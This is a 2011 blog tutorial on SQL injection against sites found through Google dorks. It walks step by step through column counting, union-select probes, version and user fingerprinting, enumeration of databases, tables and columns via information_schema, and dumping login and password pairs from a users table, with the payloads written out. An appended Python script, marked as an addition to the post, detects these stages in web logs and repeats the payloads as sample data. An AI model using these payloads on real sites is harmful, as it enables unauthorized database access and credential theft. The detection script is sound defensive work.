
Sunday, April 24, 2011

SQL injection Tutorial


  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting MySQL version and current user
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords

1. Finding vulnerable sites

To find vulnerable sites you are going to use Google dorks.
Some common dorks are:


You can read my tutorial on how to use SQL injection scanner called "SQL Poizon":

Let's say you got this site:
If we add a ' before or after the numbers, it should look something like this if it's vulnerable:

[Image: sqlitut1.jpg]

2. Finding amount of columns

To find the right number of columns we use "order by". Here is how it works:

Code:
order by 1-- (page loads normal)
order by 2-- (page loads normal)
order by 3-- (page loads normal)
order by 4-- (page loads normal)
order by 5-- (page loads normal)
order by 6-- (page loads normal)
order by 7-- (page loads normal)
order by 8-- (page loads normal)
order by 9-- (error)

This means our site has 8 columns, and we will now move on to "union select".

This is how it works:
Code: union select 1,2,3,4,5,6,7,8--

Note the hyphen - before the numbers!

This should make the website show some numbers on the screen, like this:

[Image: sqlitut2.jpg]

This means it is absolutely certain that the site is vulnerable to SQL injection.

3. Getting MySQL version and Current User

Now we want to know the MySQL version. If it's over 5, then it's injectable by this tutorial (if it's under 4, then you have to guess tables and columns).

Code: union select 1,2,@@version,4,5,6,7,8--

[Image: sqlitut3.jpg]

To get the current user, you type this:

Code: union select 1,2,user(),4,5,6,7,8--

This should display:

[Image: sqlitut4.jpg]

4. Getting Databases

Now we want to find the databases and the current database.
Here is the syntax for all databases:

Code:,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

It should display something like this:

[Image: sqlitut5.jpg]

Now we would like to know what the current database is; it's pretty obvious in this case, but useful sometimes.

Syntax for current database:


This should display something like this:

[Image: sqlitut6.jpg]

5. Getting Tables

Now we want to know the tables in the database, and for this we will continue using "union select".

Here is the code:
Code:,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

This should display something like this:

[Image: sqlitut7.jpg]

We now know that the table the passwords should be stored in is called bpusers; write it down and move on.

6. Getting Columns

Now we want to know the columns.

Here is the code:
Code:,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

This should display something like this:

[Image: sqlitut8.jpg]

7. Dumping users/pass

Now you would like to dump logins and passwords from bpusers.

Here is the code for that:
Code:,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

This would display something like this:

[Image: sqlitut9.jpg]

(NOTE: 0x3a will make a : between logins and passwords.)

You have now performed a SQL injection attack
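
Seen from the defender's side, the steps above leave a recognizable trail in web-server logs. The following is an added example, not part of the original post: it tags each logged query string with the tutorial stage it matches and reports clients that progress through several stages. The regexes, the log layout (client IP, then query string) and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One signature per tutorial step; these patterns are this example's own assumptions.
STAGES = [
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_probe", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("fingerprint", re.compile(r"@@version|\b(user|database)\s*\(\s*\)", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(schemata|tables|columns)\b", re.I)),
    ("data_dump", re.compile(r"\bgroup_concat\s*\([^)]*0x3a", re.I)),
]

# Constructed sample log lines (client IP, then raw query string); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 id=5'
203.0.113.7 id=5+order+by+8--
203.0.113.7 id=5+order+by+9--
203.0.113.7 id=-5+union+select+1,2,@@version,4,5,6,7,8--
203.0.113.7 id=-5+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
203.0.113.7 id=-5+UNION%20SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8+from+bpusers--
198.51.100.20 id=12
198.51.100.20 q=how+to+order+by+mail
"""

def stages_hit(query: str) -> list[str]:
    """Return the stages whose signature appears in one URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in STAGES if rx.search(decoded)]

def suspects(log: str, min_stages: int = 3) -> dict[str, list[str]]:
    """Map each client that covers at least min_stages distinct stages to those stages."""
    seen = defaultdict(list)
    for line in log.splitlines():
        ip, _, query = line.partition(" ")
        for stage in stages_hit(query):
            if stage not in seen[ip]:
                seen[ip].append(stage)  # keep first-seen order per client
    return {ip: s for ip, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, s in suspects(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(s))
```

Requiring several distinct stages from the same client keeps single benign hits, such as a search for "order by mail", from raising an alert.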
